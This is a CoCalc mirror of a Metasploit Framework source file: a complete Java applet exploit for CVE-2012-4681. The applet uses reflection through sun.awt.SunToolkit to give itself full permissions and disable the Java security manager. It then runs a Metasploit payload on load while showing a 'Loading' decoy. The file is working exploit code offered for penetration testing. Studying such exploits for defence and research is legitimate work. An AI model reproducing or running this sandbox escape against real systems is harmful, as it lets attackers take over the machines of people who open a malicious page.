CoCalc -- Exploit.java

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2012-4681/Exploit.java
Views: ¹¹⁷⁸⁰

1
//
2
// CVE-2012-4681 Exploit - See java_jre17_exec.rb
3
// PoC by Joshua J. Drake: https://twitter.com/jduck1337/status/239875285913317376
4
// Originally reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
5
// Oracle's Security Alert: http://www.oracle.com/technetwork/topics/security/alert-cve-2012-4681-1835715.html
6
//
7

8
import java.applet.Applet;
9
import java.awt.Graphics;
10
import java.beans.Expression;
11
import java.beans.Statement;
12
import java.lang.reflect.Field;
13
import java.net.URL;
14
import java.security.*;
15
import java.security.cert.Certificate;
16
import metasploit.Payload;
17

18
public class Exploit extends Applet
19
{
20

21
    public Exploit()
22
    {
23
    }
24

25
    public void disableSecurity()
26
        throws Throwable
27
    {
28
        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
29
        Permissions localPermissions = new Permissions();
30
        localPermissions.add(new AllPermission());
31
        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
32
        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
33
            localProtectionDomain
34
        });
35
        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
36
        localStatement.execute();
37
    }
38

39
    private Class GetClass(String paramString)
40
        throws Throwable
41
    {
42
        Object arrayOfObject[] = new Object[1];
43
        arrayOfObject[0] = paramString;
44
        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
45
        localExpression.execute();
46
        return (Class)localExpression.getValue();
47
    }
48

49
    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
50
        throws Throwable
51
    {
52
        Object arrayOfObject[] = new Object[2];
53
        arrayOfObject[0] = paramClass;
54
        arrayOfObject[1] = paramString;
55
        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
56
        localExpression.execute();
57
        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
58
    }
59

60
    public void init()
61
    {
62
        try
63
        {
64
            disableSecurity();
65
			Payload.main(null);               
66
        }
67
        catch(Throwable localThrowable)
68
        {
69
            localThrowable.printStackTrace();
70
        }
71
    }
72

73
    public void paint(Graphics paramGraphics)
74
    {
75
        paramGraphics.drawString("Loading", 50, 25);
76
    }
77
}
78

79

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.